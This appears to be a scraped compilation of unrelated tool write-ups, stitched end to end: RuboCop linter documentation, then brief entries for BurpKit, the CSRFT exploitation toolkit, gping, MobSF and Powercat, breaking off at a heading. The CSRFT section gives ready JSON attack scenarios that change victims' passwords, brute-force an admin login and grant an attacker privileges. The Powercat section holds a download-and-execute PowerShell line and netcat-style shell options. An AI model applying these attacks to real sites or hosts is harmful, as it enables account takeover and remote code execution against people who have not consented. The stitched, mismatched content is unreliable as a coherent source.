Most of the cops in RuboCop are so-called style cops that check for stylistic problems in your code. Almost all of them are based on the Ruby Style Guide. Many of the style cops have configuration options allowing them to support different popular coding conventions.

Lint
Lint cops check for possible errors and very bad practices in your code. RuboCop implements in a portable way all built-in MRI lint checks ( ruby -wc ) and adds a lot of extra lint checks of its own. You can run only the lint cops like this:
$ rubocop -l
The -l / --lint option can be used together with --only to run all the enabled lint cops plus a selection of other cops.
Disabling any of the lint cops is generally a bad idea.

Metrics
Metrics cops deal with properties of the source code that can be measured, such as class length, method length, etc. Generally speaking, they have a configuration parameter called Max and when running rubocop --auto-gen-config , this parameter will be set to the highest value found for the inspected code.

Rails
Rails cops are specific to the Ruby on Rails framework. Unlike style and lint cops they are not used by default and you have to request them specifically:
$ rubocop -R
or add the following directive to your .rubocop.yml :
AllCops:
RunRailsCops: true

Configuration
The behavior of RuboCop can be controlled via the .rubocop.yml configuration file. It makes it possible to enable/disable certain cops (checks) and to alter their behavior if they accept any parameters. The file can be placed either in your home directory or in some project directory.
RuboCop will start looking for the configuration file in the directory where the inspected file is and continue its way up to the root directory.
The file has the following format:
inherit_from: ../.rubocop.yml

Style/Encoding:
Enabled: false

Metrics/LineLength:
Max: 99
Note : Qualifying cop name with its type, e.g., Style , is recommended, but not necessary as long as the cop name is unique across all types.

Inheritance
RuboCop supports inheriting configuration from one or more supplemental configuration files at runtime.

Inheriting from another configuration file in the project
The optional inherit_from directive is used to include configuration from one or more files. This makes it possible to have the common project settings in the .rubocop.yml file at the project root, and then only the deviations from those rules in the subdirectories. The files can be given with absolute paths or paths relative to the file where they are referenced. The settings after an inherit_from directive override any settings in the file(s) inherited from. When multiple files are included, the first file in the list has the lowest precedence and the last one has the highest. The format for multiple inheritance is:
inherit_from:
- ../.rubocop.yml
- ../conf/.rubocop.yml
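To make the precedence concrete, here is a hypothetical pair of files (the cop name and values are illustrative): settings in the inheriting file override whatever the parent sets.

```yaml
# ../.rubocop.yml (project root)
Metrics/LineLength:
  Max: 80

# subdir/.rubocop.yml
inherit_from: ../.rubocop.yml

Metrics/LineLength:
  Max: 99   # wins over the inherited Max: 80 for files under subdir/
```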

Inheriting configuration from a dependency gem
The optional inherit_gem directive is used to include configuration from one or more gems external to the current project. This makes it possible to inherit a shared dependency's RuboCop configuration that can be used from multiple disparate projects.
Configurations inherited in this way will be essentially prepended to the inherit_from directive, such that the inherit_gem configurations will be loaded first, then the inherit_from relative file paths will be loaded (overriding the configurations from the gems), and finally the remaining directives in the configuration file will supersede any of the inherited configurations. This means the configurations inherited from one or more gems have the lowest precedence of inheritance.
The directive should be formatted as a YAML Hash using the gem name as the key and the relative path within the gem as the value:
inherit_gem:
rubocop: config/default.yml
my-shared-gem: .rubocop.yml
cucumber: conf/rubocop.yml
Note : If the shared dependency is declared using a Bundler Gemfile and the gem was installed using bundle install , it would be necessary to also invoke RuboCop using Bundler in order to find the dependency's installation path at runtime:
$ bundle exec rubocop <options...>

Defaults
The file config/default.yml under the RuboCop home directory contains the default settings that all configurations inherit from. Project and personal .rubocop.yml files need only make settings that are different from the default ones. If there is no .rubocop.yml file in the project or home directory, config/default.yml will be used.

Including/Excluding files
RuboCop checks all files found by a recursive search starting from the directory it is run in, or directories given as command line arguments. However, it only recognizes files ending with .rb or extensionless files with a #!.*ruby declaration as Ruby files. Hidden directories (i.e., directories whose names start with a dot) are not searched by default. If you'd like it to check files that are not included by default, you'll need to pass them in on the command line, or to add entries for them under AllCops / Include . Files and directories can also be ignored through AllCops / Exclude .
Here is an example that might be used for a Rails project:
AllCops:
Include:
- '**/Rakefile'
- '**/config.ru'
Exclude:
- 'db/**/*'
- 'config/**/*'
- 'script/**/*'
- !ruby/regexp /old_and_unused\.rb$/

# other configuration
# ...
Files and directories are specified relative to the .rubocop.yml file.
Note : Patterns that are just a file name, e.g. Rakefile , will match that file name in any directory, but this pattern style is deprecated. The correct way to match the file in any directory, including the current, is **/Rakefile .
Note : The pattern config/** will match any file recursively under config , but this pattern style is deprecated and should be replaced by config/**/* .
Note : The Include and Exclude parameters are special. They are valid for the directory tree starting where they are defined. They are not shadowed by the setting of Include and Exclude in other .rubocop.yml files in subdirectories. This is different from all other parameters, which follow RuboCop's general principle that configuration for an inspected file is taken from the nearest .rubocop.yml , searching upwards.
Cops can be run only on specific sets of files when that's needed (for instance you might want to run some Rails model checks only on files whose paths match app/models/*.rb ). All cops support the Include param.
Rails/DefaultScope:
Include:
- app/models/*.rb
Cops can also exclude only specific sets of files when that's needed (for instance you might want to run some cop only on a specific file). All cops support the Exclude param.
Rails/DefaultScope:
Exclude:
- app/models/problematic.rb

Generic configuration parameters
In addition to Include and Exclude , the following parameters are available for every cop.

Enabled
Specific cops can be disabled by setting Enabled to false for that specific cop.
Metrics/LineLength:
Enabled: false
Most cops are enabled by default. Some cops, configured in config/disabled.yml , are disabled by default. The cop enabling process can be altered by setting DisabledByDefault to true .
AllCops:
DisabledByDefault: true
All cops are then disabled by default, and only cops appearing in user configuration files are enabled. Enabled: true does not have to be set for cops in user configuration. They will be enabled anyway.
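For example, a hypothetical whitelist-style configuration (the cop names and values are illustrative) might look like this; with DisabledByDefault: true , only the cops mentioned below will run:

```yaml
AllCops:
  DisabledByDefault: true

# Merely mentioning a cop in the configuration enables it;
# Enabled: true is implied.
Style/StringLiterals:
  EnforcedStyle: double_quotes

Metrics/LineLength:
  Max: 99
```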

Severity
Each cop has a default severity level based on which department it belongs to. The level is warning for Lint and convention for all the others. Cops can customize their severity level. Allowed params are refactor , convention , warning , error and fatal .
There is one exception from the general rule above and that is Lint/Syntax , a special cop that checks for syntax errors before the other cops are invoked. It can not be disabled and its severity ( fatal ) can not be changed in configuration.
Metrics/CyclomaticComplexity:
Severity: warning

AutoCorrect
Cops that support the --auto-correct option can have that support disabled. For example:
Style/PerlBackrefs:
AutoCorrect: false

Automatically Generated Configuration
If you have a code base with an overwhelming amount of offenses, it can be a good idea to use rubocop --auto-gen-config and add an inherit_from: .rubocop_todo.yml in your .rubocop.yml . The generated file .rubocop_todo.yml contains configuration to disable cops that currently detect an offense in the code by excluding the offending files, or disabling the cop altogether once a file count limit has been reached.
By adding the option --exclude-limit COUNT , e.g., rubocop --auto-gen-config --exclude-limit 5 , you can change how many files are excluded before the cop is entirely disabled. The default COUNT is 15.
Then you can start removing the entries in the generated .rubocop_todo.yml file one by one as you work through all the offenses in the code.
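A generated .rubocop_todo.yml might look roughly like the following sketch (the cop names, paths, and counts are hypothetical): offending files are excluded per cop, and any cop that offended in more files than the exclude limit is disabled outright.

```yaml
# This configuration was generated by `rubocop --auto-gen-config`.
# Offense count: 2
Style/Documentation:
  Exclude:
    - 'lib/foo.rb'
    - 'lib/bar.rb'

# Offense count: 20
# This cop offended in more files than the --exclude-limit,
# so it is disabled entirely instead of listing each file.
Metrics/AbcSize:
  Enabled: false
```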

Disabling Cops within Source Code
One or more individual cops can be disabled locally in a section of a file by adding a comment such as
# rubocop:disable Metrics/LineLength, Style/StringLiterals
[...]
# rubocop:enable Metrics/LineLength, Style/StringLiterals
You can also disable all cops with
# rubocop:disable all
[...]
# rubocop:enable all
One or more cops can be disabled on a single line with an end-of-line comment.
for x in (0..19) # rubocop:disable Style/AvoidFor

Formatters
You can change the output format of RuboCop by specifying formatters with the -f/--format option. RuboCop ships with several built-in formatters, and you can also create your own custom formatter.
Additionally the output can be redirected to a file instead of $stdout with the -o/--out option.
Some of the built-in formatters produce machine-parsable output and they are considered public APIs. The rest of the formatters are for humans, so parsing their outputs is discouraged.
You can enable multiple formatters at the same time by specifying -f/--format multiple times. The -o/--out option applies to the previously specified -f/--format , or the default progress format if no -f/--format is specified before the -o/--out option.
# Simple format to $stdout.
$ rubocop --format simple

# Progress (default) format to the file result.txt.
$ rubocop --out result.txt

# Both progress and offense count formats to $stdout.
# The offense count formatter outputs only the final summary,
# so you'll mostly see the outputs from the progress formatter,
# and at the end the offense count summary will be output.
$ rubocop --format progress --format offenses

# Progress format to $stdout, and JSON format to the file rubocop.json.
$ rubocop --format progress --format json --out rubocop.json
# The --out option applies to the preceding --format json, so the JSON
# report goes to rubocop.json while the progress output goes to $stdout.

# Progress format to result.txt, and simple format to $stdout.
$ rubocop --out result.txt --format simple
# Here --out precedes any --format, so it applies to the default progress
# format; the simple output goes to $stdout.
You can also load custom formatters .

Progress Formatter (default)
The default progress formatter outputs a character for each inspected file, and at the end it displays all detected offenses in the clang format. A . represents a clean file, and each of the capital letters means the severest offense (convention, warning, error or fatal) found in a file.
$ rubocop
Inspecting 26 files
..W.C....C..CWCW.C...WC.CC

Offenses:

lib/foo.rb:6:5: C: Missing top-level class documentation comment.
class Foo
^^^^^

...

26 files inspected, 46 offenses detected

Clang Style Formatter
The clang formatter displays the offenses in a manner similar to clang :
$ rubocop test.rb
Inspecting 1 file
W

Offenses:

test.rb:1:5: C: Use snake_case for method names.
def badName
^^^^^^^
test.rb:2:3: C: Use a guard clause instead of wrapping the code inside a conditional expression.
if something
^^
test.rb:2:3: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
if something
^^
test.rb:4:5: W: end at 4, 4 is not aligned with if at 2, 2
end
^^^

1 file inspected, 4 offenses detected

Fuubar Style Formatter
The fuubar style formatter displays a progress bar and shows details of offenses in the clang format as soon as they are detected. This is inspired by the Fuubar formatter for RSpec.
$ rubocop --format fuubar
lib/foo.rb:1:1: C: Use snake_case for methods and variables.
def badName
^^^^^^^
lib/bar.rb:13:14: W: File.exists? is deprecated in favor of File.exist?.
File.exists?(path)
^^^^^^^
22/53 files |======== 43 ========> | ETA: 00:00:02

Emacs Style Formatter
Machine-parsable
The emacs formatter displays the offenses in a format suitable for consumption by Emacs (and possibly other tools).
$ rubocop --format emacs test.rb
/Users/bozhidar/projects/test.rb:1:1: C: Use snake_case for methods and variables.
/Users/bozhidar/projects/test.rb:2:3: C: Favor modifier if/unless usage when you have a single-line body. Another good alternative is the usage of control flow &&/||.
/Users/bozhidar/projects/test.rb:4:5: W: end at 4, 4 is not aligned with if at 2, 2

Simple Formatter
The name of the formatter says it all :-)
$ rubocop --format simple test.rb
== test.rb ==
C: 1: 5: Use snake_case for method names.
C: 2: 3: Use a guard clause instead of wrapping the code inside a conditional expression.
C: 2: 3: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
W: 4: 5: end at 4, 4 is not aligned with if at 2, 2

1 file inspected, 4 offenses detected

File List Formatter
Machine-parsable
Sometimes you might want to just open all files with offenses in your favorite editor. This formatter outputs just the names of the files with offenses in them and makes it possible to do something like:
$ rubocop --format files | xargs vim

JSON Formatter
Machine-parsable
You can get RuboCop's inspection result in JSON format by passing --format json option in command line. The JSON structure is like the following example:
{
"metadata": {
"rubocop_version": "0.9.0",
"ruby_engine": "ruby",
"ruby_version": "2.0.0",
"ruby_patchlevel": "195",
"ruby_platform": "x86_64-darwin12.3.0"
},
"files": [{
"path": "lib/foo.rb",
"offenses": []
}, {
"path": "lib/bar.rb",
"offenses": [{
"severity": "convention",
"message": "Line is too long. [81/80]",
"cop_name": "LineLength",
"corrected": true,
"location": {
"line": 546,
"column": 80,
"length": 4
}
}, {
"severity": "warning",
"message": "Unreachable code detected.",
"cop_name": "UnreachableCode",
"corrected": false,
"location": {
"line": 15,
"column": 9,
"length": 10
}
}
]
}
],
"summary": {
"offense_count": 2,
"target_file_count": 2,
"inspected_file_count": 2
}
}
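Because the JSON output is machine-parsable and considered a public API, it is easy to post-process. A minimal sketch (the report below is a trimmed, hypothetical version of the example above) that tallies offenses per cop:

```ruby
require 'json'

# Hypothetical report, trimmed from the example above; the field names
# match RuboCop's --format json output.
report = JSON.parse(<<~JSON)
  {
    "files": [
      { "path": "lib/foo.rb", "offenses": [] },
      { "path": "lib/bar.rb", "offenses": [
        { "severity": "convention", "cop_name": "LineLength" },
        { "severity": "warning", "cop_name": "UnreachableCode" }
      ] }
    ],
    "summary": { "offense_count": 2, "inspected_file_count": 2 }
  }
JSON

# Tally offenses per cop across all files.
counts = Hash.new(0)
report['files'].each do |file|
  file['offenses'].each { |o| counts[o['cop_name']] += 1 }
end

p counts                               # per-cop tally
p report['summary']['offense_count']   # total from the summary block
```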

Offense Count Formatter
Sometimes when first applying RuboCop to a codebase, it's nice to be able to see where most of your style cleanup is going to be spent.
With this in mind, you can use the offense count formatter to outline the offended cops and the number of offenses found for each by running:
$ rubocop --format offenses

87 Documentation
12 DotPosition
8 AvoidGlobalVars
7 EmptyLines
6 AssignmentInCondition
4 Blocks
4 CommentAnnotation
3 BlockAlignment
1 IndentationWidth
1 AvoidPerlBackrefs
1 ColonMethodCall
--
134 Total

HTML Formatter
Useful for CI environments. It will create an HTML report like this .
$ rubocop --format html -o rubocop.html

Compatibility
RuboCop supports the following Ruby implementations:
  • MRI 1.9.3
  • MRI 2.0
  • MRI 2.1
  • MRI 2.2
  • JRuby in 1.9 mode
  • Rubinius 2.0+

Editor integration

Emacs
rubocop.el is a simple Emacs interface for RuboCop. It allows you to run RuboCop inside Emacs and quickly jump between problems in your code.
flycheck > 0.9 also supports RuboCop and uses it by default when available.

Vim
The vim-rubocop plugin runs RuboCop and displays the results in Vim.
There's also a RuboCop checker in syntastic .

Sublime Text
If you're a ST user you might find the Sublime RuboCop plugin useful.

Brackets
The brackets-rubocop extension displays RuboCop results in Brackets. It can be installed via the extension manager in Brackets.

TextMate2
The textmate2-rubocop bundle displays formatted RuboCop results in a new window. Installation instructions can be found here .

Atom
The atom-lint package runs RuboCop and highlights the offenses in Atom.
You can also use the linter-rubocop plugin for Atom's linter .

LightTable
The lt-rubocop plugin provides LightTable integration.

RubyMine
The rubocop-for-rubymine plugin provides basic RuboCop integration for RubyMine/IntelliJ IDEA.

Other Editors
Here's one great opportunity to contribute to RuboCop - implement RuboCop integration for your favorite editor.

Git pre-commit hook integration
overcommit is a fully configurable and extendable Git commit hook manager. To use RuboCop with overcommit, add the following to your .overcommit.yml file:
PreCommit:
RuboCop:
enabled: true

Guard integration
If you're fond of Guard you might like guard-rubocop . It allows you to automatically check Ruby code style with RuboCop when files are modified.

Rake integration
To use RuboCop in your Rakefile add the following:
require 'rubocop/rake_task'

RuboCop::RakeTask.new
If you run rake -T , the following two RuboCop tasks should show up:
rake rubocop                                  # Run RuboCop
rake rubocop:auto_correct # Auto-correct RuboCop offenses
The above will use default values
require 'rubocop/rake_task'

desc 'Run RuboCop on the lib directory'
RuboCop::RakeTask.new(:rubocop) do |task|
task.patterns = ['lib/**/*.rb']
# only show the files with failures
task.formatters = ['files']
# don't abort rake on failure
task.fail_on_error = false
end

Caching
Large projects containing hundreds or even thousands of files can take a really long time to inspect, but RuboCop has functionality to mitigate this problem. There's a caching mechanism that stores information about offenses found in inspected files.

Cache Validity
Later runs will be able to retrieve this information and present it instead of inspecting the file again. This will be done if the cache for the file is still valid, which it is if there are no changes in:
  • the contents of the inspected file
  • RuboCop configuration for the file
  • the options given to rubocop , with some exceptions that have no bearing on which offenses are reported
  • the Ruby version used to invoke rubocop
  • version of the rubocop program (or to be precise, anything in the source code of the invoked rubocop program)
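Conceptually, the cache key behaves like a digest over all of those inputs; the sketch below is only an illustration of the idea (the helper name and arguments are hypothetical), not RuboCop's actual implementation:

```ruby
require 'digest'

# Hypothetical helper: any change to the file contents, the applicable
# configuration, the relevant CLI options, the Ruby version, or the
# RuboCop version yields a different cache key.
def cache_key(file_contents, config, options, ruby_version, rubocop_version)
  Digest::SHA1.hexdigest(
    [file_contents, config, options.sort.join(','),
     ruby_version, rubocop_version].join("\0")
  )
end

a = cache_key("def foo; end\n", "Max: 99", ["--lint"], "2.2.0", "0.34.0")
b = cache_key("def foo; end\n", "Max: 99", ["--lint"], "2.2.0", "0.34.0")
c = cache_key("def foo; 1; end\n", "Max: 99", ["--lint"], "2.2.0", "0.34.0")
# a == b (identical inputs), while c differs because the file changed.
```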

Enabling and Disabling the Cache
The caching functionality is enabled if the configuration parameter AllCops: UseCache is true , which it is by default. The command line option --cache false can be used to turn off caching, thus overriding the configuration parameter. If AllCops: UseCache is set to false in the local .rubocop.yml , then it's --cache true that overrides the setting.

Cache Path
By default, the cache is stored in a subdirectory of the temporary directory, /tmp/rubocop_cache/ on Unix-like systems. The configuration parameter AllCops: CacheRootDirectory can be used to set it to a different path. One reason to use this option could be that there's a network disk where users on different machines want to have a common RuboCop cache. Another could be that a Continuous Integration system allows directories, but not a temporary directory, to be saved between runs.

Cache Pruning
Each time a file has changed, its offenses will be stored under a new key in the cache. This means that the cache will continue to grow until we do something to stop it. The configuration parameter AllCops: MaxFilesInCache sets a limit, and when the number of files in the cache exceeds that limit, the oldest files will be automatically removed from the cache.

Extensions
It's possible to extend RuboCop with custom cops and formatters.

Loading Extensions
Besides the --require command line option you can also specify Ruby files that should be loaded with the optional require directive in the .rubocop.yml file:
require:
- ../my/custom/file.rb
- rubocop-extension
Note: The paths are directly passed to Kernel.require . If your extension file is not in $LOAD_PATH , you need to specify the path explicitly, either as a relative path prefixed with ./ or as an absolute path.

Custom Cops
You can configure the custom cops in your .rubocop.yml just like any other cop.

Known Custom Cops

Custom Formatters
You can customize RuboCop's output format with custom formatters.

Creating Custom Formatter
To implement a custom formatter, you need to subclass RuboCop::Formatter::BaseFormatter and override some methods, or implement all formatter API methods by duck typing.
Please see the documents below for more formatter API details.

Using Custom Formatter in Command Line
You can tell RuboCop to use your custom formatter with a combination of the --format and --require options. For example, when you have defined MyCustomFormatter in ./path/to/my_custom_formatter.rb , you would type this command:
$ rubocop --require ./path/to/my_custom_formatter --format MyCustomFormatter
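Since the formatter API can be satisfied by duck typing, a formatter does not even have to subclass BaseFormatter. The sketch below is a self-contained illustration: the hook names started / file_finished / finished follow the formatter API, while the CountingFormatter class and the stand-in Offense struct are hypothetical.

```ruby
require 'stringio'

# Duck-typed formatter sketch: responds to the formatter API hooks and
# writes to the IO object it is constructed with. Offense objects are
# assumed here to respond to #line and #message.
class CountingFormatter
  def initialize(output)
    @output = output
    @total = 0
  end

  def started(target_files); end

  def file_finished(file, offenses)
    @total += offenses.size
    offenses.each { |o| @output.puts "#{file}:#{o.line}: #{o.message}" }
  end

  def finished(inspected_files)
    @output.puts "#{inspected_files.size} files, #{@total} offenses"
  end
end

# Exercising it with stand-in offense data:
Offense = Struct.new(:line, :message)
io = StringIO.new
f = CountingFormatter.new(io)
f.started(['a.rb', 'b.rb'])
f.file_finished('a.rb', [Offense.new(1, 'Use snake_case.')])
f.file_finished('b.rb', [])
f.finished(['a.rb', 'b.rb'])
puts io.string
```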


Burpkit - Next-Gen Burpsuite Penetration Testing Tool


Welcome to the next generation of web application penetration testing - using WebKit to own the web. BurpKit is a BurpSuite plugin which helps in assessing complex web apps that render the contents of their pages dynamically. It also provides a bi-directional JavaScript bridge API which allows users to create quick one-off BurpSuite plugin prototypes which can interact directly with the DOM and Burp's extender API.

System Requirements
BurpKit has the following system requirements:
  • Oracle JDK >=8u50 and <9 ( Download )
  • At least 4GB of RAM

Installation
Installing BurpKit is simple:
  1. Download the latest prebuilt release from the GitHub releases page .
  2. Open BurpSuite and navigate to the Extender tab.
  3. Under Burp Extensions click the Add button.
  4. In the Load Burp Extension dialog, make sure that Extension Type is set to Java and click the Select file ... button under Extension Details .
  5. Select the BurpKit-<version>.jar file and click Next when done.
If all goes well, you will see three additional top-level tabs appear in BurpSuite:
  1. BurpKitty : a courtesy browser for navigating the web within BurpSuite.
  2. BurpScript IDE : a lightweight integrated development environment for writing JavaScript-based BurpSuite plugins and other things.
  3. Jython : an integrated python interpreter console and lightweight script text editor.

BurpScript
BurpScript enables users to write desktop-based JavaScript applications as well as BurpSuite extensions using the JavaScript scripting language. This is achieved by injecting two new objects by default into the DOM on page load:
  1. burpKit : provides numerous features including file system I/O support and easy JS library injection.
  2. burpCallbacks : the JavaScript equivalent of the IBurpExtenderCallbacks interface in Java with a few slight modifications.
Take a look at the examples folder for more information.

More Information?
A readable version of the docs can be found here .



CSRFT - Cross Site Request Forgeries (Exploitation) Toolkit


This project has been developed to exploit CSRF Web vulnerabilities and provide you with a quick and easy exploitation toolkit. In a few words, this is a simple HTTP server in NodeJS that will communicate with the clients (victims) and send them payloads to be executed using JavaScript.

This has been developed entirely in NodeJS, and configuration files are in JSON format.

* However, there's a tool in Python in utils folder that you can use to automate CSRF exploitation. *

This project allows you to perform PoCs (Proofs of Concept) really easily. Let's see how to get and use it.

How to get/use the tool
First, clone it :
$ git clone git@github.com:PaulSec/CSRFT.git
To make this project work, get the latest Node.js version here . Go into the directory and install all the dependencies:
npm install
Then, launch the server.js :
$ node server.js
Usage will be displayed :
Usage : node server.js <file.json> <port : default 8080>

More information
By default, the server will be launched on the port 8080, so you can access it via : http://0.0.0.0:8080 .
The JSON file must describe your attack scenarios. It can be wherever you want on your hard drive.
The index page displayed on the browser is accessible via : /views/index.ejs .
You can change it as you want and give the link to your victim.

Different folders : What do they mean ?
The idea is to provide a 'basic' hierarchy (of the folders) for your projects. I made the script quite modular so your configuration files/malicious forms, etc. don't have to be in those folders though. This is more like a good practice/advice for your future projects.

However, here is a little summary of those folders :
  • conf folder : add your JSON configuration files here.
  • exploits folder : add all your *.html files containing your forms
  • public folder : containing jquery.js and inject.js (script loaded when accessing 0.0.0.0:8080)
  • views folder : index file and exploit template
  • dicos : Folder containing all your dictionaries for those attacks
  • lib : libs specific for my project (custom ones)
  • utils : folder containing utils such as : csrft_utils.py which will launch CSRFT directly.
  • server.js file - the HTTP server

Configuration file templates

GET Request with special value
Here is a basic example of a JSON configuration file that will target www.vulnerable.com . This is a "special value" attack because the malicious payload is already in the URL/form.
{
"audit": {
"name": "PoC done with Automatic Tool",
"scenario": [
{
"attack": [
{
"method": "GET",
"type_attack": "special_value",
"url": "http://www.vulnerable.com/changePassword.php?newPassword=csrfAttacks"
}
]
}
]
}
}

GET Request with dictionary attack
Here is a basic example of a JSON configuration file. For every entry in the dictionary file, an HTTP request will be made.
{
"audit": {
"name": "PoC done with Automatic Tool",
"scenario": [
{
"attack": [
{
"file": "./dicos/passwords.txt",
"method": "GET",
"type_attack": "dico",
"url": "http://www.vulnerable.com/changePassword.php?newPassword=<%value%>"
}
]
}
]
}
}

POST Request with special value attack
{
"audit": {
"name": "PoC done with Automatic Tool",
"scenario": [
{
"attack": [
{
"form": "/tmp/csrft/form.html",
"method": "POST",
"type_attack": "special_value"
}
]
}
]
}
}
The form already includes the malicious payload. So it just has to be executed by the victim.
I hope you understood the principles. I didn't write an example for a POST with a dictionary attack because there will be one in the next section.

Ok but what do Scenario and Attack mean ?
A scenario is composed of attacks. Those attacks can be simultaneous or happen at different times.
For example, you may want to sign the user in and THEN have him perform some unwanted actions. You can specify this in the JSON file.
Let's take an example with both POST and GET Request :
{
"audit": {
"name": "DeepSec | Login the admin, give privilege to the Hacker and log him out",

"scenario": [
{
"attack": [
{
"method": "POST",
"type_attack": "dico",
"file": "passwords.txt",
"form": "deepsec_form_log_user.html",
"comment": "attempt to connect the admin with a list of selected passwords"
}
]
},
{
"attack": [
{
"method": "GET",
"type_attack": "special_value",
"url": "http://192.168.56.1/vuln-website/index.php/welcome/upgrade/27",
"comment": "then, after the login session, we expect the admin to be logged in, attempt to upgrade our account"
}
]
},
{
"attack": [
{
"method": "GET",
"type_attack": "special_value",
"url": "http://192.168.56.1/vuln-website/index.php/welcome/logout",
"comment": "The final step is to logout the admin"
}
]
}
]
}
}
You can now define some "steps", different attacks that will be executed in a certain order.

Use cases

A) I want to write my specific JSON configuration file and launch it by hand
Based on the templates which are available, you can easily create your own. If you have any trouble creating it, feel free to contact me and I'll try to help you as much as I can, but it shouldn't be that complicated.
Steps to succeed :
1) Create your configuration file, see samples in conf/ folder
2) Add your .html files in the exploits/ folder with the different payloads if the CSRF is POST vulnerable
3) If you want to do a dictionary attack, add your dictionary file to the dicos/ folder,
4) Replace the value of the field you want to perform this attack with the token <%value%>
=> either in your urls if GET exploitation, or in the HTML files if POST exploitation.
5) Launch the application : node server.js conf/test.json
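For steps 2 and 4 of a POST exploitation, a malicious form might look like this hypothetical exploits/change_password.html (the target URL and field name are illustrative); during a dictionary attack, CSRFT substitutes each dictionary entry for the <%value%> token:

```html
<!-- Hypothetical self-submitting form for a POST CSRF attack. -->
<form id="csrf" action="http://www.vulnerable.com/changePassword.php" method="POST">
  <input type="hidden" name="newPassword" value="<%value%>" />
</form>
<script>document.getElementById('csrf').submit();</script>
```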


B) I want to automate attacks really easily
To do so, I developed a Python script csrft_utils.py in the utils folder that will do this for you.
Here are some basic use cases :
* GET parameter with Dictionary attack : *
$ python csrft_utils.py --url="http://www.vulnerable.com/changePassword.php?newPassword=csvulnerableParameter" --param=newPassword --dico_file="../dicos/passwords.txt"
* POST parameter with Special value attack : *
$ python csrft_utils.py --form=http://website.com/user.php --id=changePassword --param=password password=newPassword --special_value


Gping - Ping, But With A Graph


Ping, but with a graph

Install and run
Created/tested with Python 3.4, should run on 2.7 (will require the statistics module though).
pip3 install pinggraph

Tested on Windows and Ubuntu, should run on OS X as well. After installation just run:
gping [yourhost]

If you don't give a host then it pings google.

Why?
My apartment's internet is all 4G, and while it's normally pretty fast it can be a bit flaky. I often found myself running ping -t google.com in a command window to get a rough idea of the network speed, and I thought a graph would be a great way to visualize the data. I still wanted to use just the command line, though, so I decided to try to write a cross-platform tool that I could use. And here we are.

Code
For a quick hack the code started off really nice, but after I decided pretty colors were a good addition it quickly got rather complicated. Inside pinger.py is a function plot() ; this uses a canvas-like object to "draw" things like lines and boxes to the screen. I found on Windows that changing the colors is slow and caused the screen to flicker, so there's a big mess of a function called process_colors to try to optimize that. Don't ask.


MobSF (Mobile Security Framework) - Mobile (Android/iOS) Automated Pen-Testing Framework


Mobile Security Framework (MobSF) is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. We've been depending on multiple tools to carry out reversing, decoding, debugging, code review, and pen-testing, and this process requires a lot of effort and time. Mobile Security Framework can be used for effective and fast security analysis of Android and iOS applications. It supports binaries (APK & IPA) and zipped source code.

The static analyzer is able to perform automated code review, detect insecure permissions and configurations, and detect insecure code such as SSL overriding, SSL bypass, weak crypto, obfuscated code, improper permissions, hardcoded secrets, improper usage of dangerous APIs, leakage of sensitive/PII information, and insecure file storage. The dynamic analyzer runs the application in a VM or on a configured device and detects issues at run time. Further analysis is done on the captured network packets, decrypted HTTPS traffic, application dumps, logs, error or crash reports, debug information, stack traces, and on application assets like setting files, preferences, and databases. The framework is highly extensible, so you can add your custom rules with ease. A quick and clean report can be generated at the end of the tests. We will be extending this framework to support other mobile platforms like Tizen, Windows Phone, etc. in the future.

Documentation

Queries

Screenshots and Sample Report

Static Analysis - Android APK




Static Analysis - iOS IPA



Sample Report: http://opensecurity.in/research/security-analysis-of-android-browsers.html

v0.8.8 Changelog
  • New name: Mobile Security Framework (MobSF)
  • Added Dynamic Analysis
  • VM Available for Download
  • Fixed RCE
  • Fixed Broken Manifest File Parsing Logic
  • Sqlite DB Support
  • Fixed Reporting with new PDF report
  • Rescan Option
  • Detect Root Detection
  • Added Requirements.txt
  • Automated Java Path Detection
  • Improved Manifest and Code Analysis
  • Fixed Unzipping error for Unix.
  • Activity Tester Module
  • Exported Activity Tester Module
  • Device API Hooker with DroidMon
  • SSL Certificate Pinning Bypass with JustTrustMe
  • RootCloak to prevent root Detection
  • Data Pusher to Dump Application Data
  • pyWebproxy to decrypt SSL Traffic

v0.8.7 Changelog
  • Improved Static Analysis Rules
  • Better AndroidManifest View
  • Search in Files

v0.8.6 Changelog
  • Detects implicitly exported component from manifest.
  • Added CFR decompiler support
  • Fixed Regex DoS on URL Regex

v0.8.5 Changelog
  • Bug Fix to support IPA MIME Type: application/x-itunes-ipa

v0.8.4 Changelog
  • Improved Android Static Code Analysis speed (2X performance)
  • Static Code analysis on Dexguard protected APK.
  • Fixed a Security Issue - Email Regex DoS.
  • Added Logging Code.
  • All Browser Support.
  • MIME Type Bug fix to Support IE.
  • Fixed Progress Bar.

v0.8.3 Changelog
  • View AndroidManifest.xml & Info.plist
  • Supports iOS Binary (IPA)
  • Bug Fix for Linux (Ubuntu), missing MIME Type Detection
  • Check for Hardcoded Certificates
  • Added Code to prevent from Directory Traversal

Credits
  • Bharadwaj Machiraju (@tunnelshade_) - For writing pyWebProxy from scratch
  • Thomas Abraham - For JS Hacks on UI.
  • Anto Joseph (@antojosep007) - For the help with SuperSU.
  • Tim Brown (@timb_machine) - For the iOS Binary Analysis Ruleset.
  • Abhinav Sejpal (@Abhinav_Sejpal) - For poking me with bugs and feature requests.
  • Anant Srivastava (@anantshri) - For Activity Tester Idea


Powercat - Netcat: The Powershell Version


Installation
powercat is a PowerShell function. You need to load the function before you can execute it. You can put one of the commands below into your PowerShell profile so powercat is automatically loaded when PowerShell starts.
Load The Function From Downloaded .ps1 File:
. .\powercat.ps1
Load The Function From URL:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Parameters:
-l      Listen for a connection.                             [Switch]
-c Connect to a listener. [String]
-p The port to connect to, or listen on. [String]
-e Execute. (GAPING_SECURITY_HOLE) [String]
-ep Execute Powershell. [Switch]
-r Relay. Format: "-r tcp:10.1.1.1:443" [String]
-u Transfer data over UDP. [Switch]
-dns Transfer data over dns (dnscat2). [String]
-dnsft DNS Failure Threshold. [int32]
-t Timeout option. Default: 60 [int32]
-i Input: Filepath (string), byte array, or string. [object]
-o Console Output Type: "Host", "Bytes", or "String" [String]
-of Output File Path. [String]
-d Disconnect after connecting. [Switch]
-rep Repeater. Restart after disconnecting. [Switch]
-g Generate Payload. [Switch]
-ge Generate Encoded Payload. [Switch]
-h Print the help message. [Switch]

Basic Connections
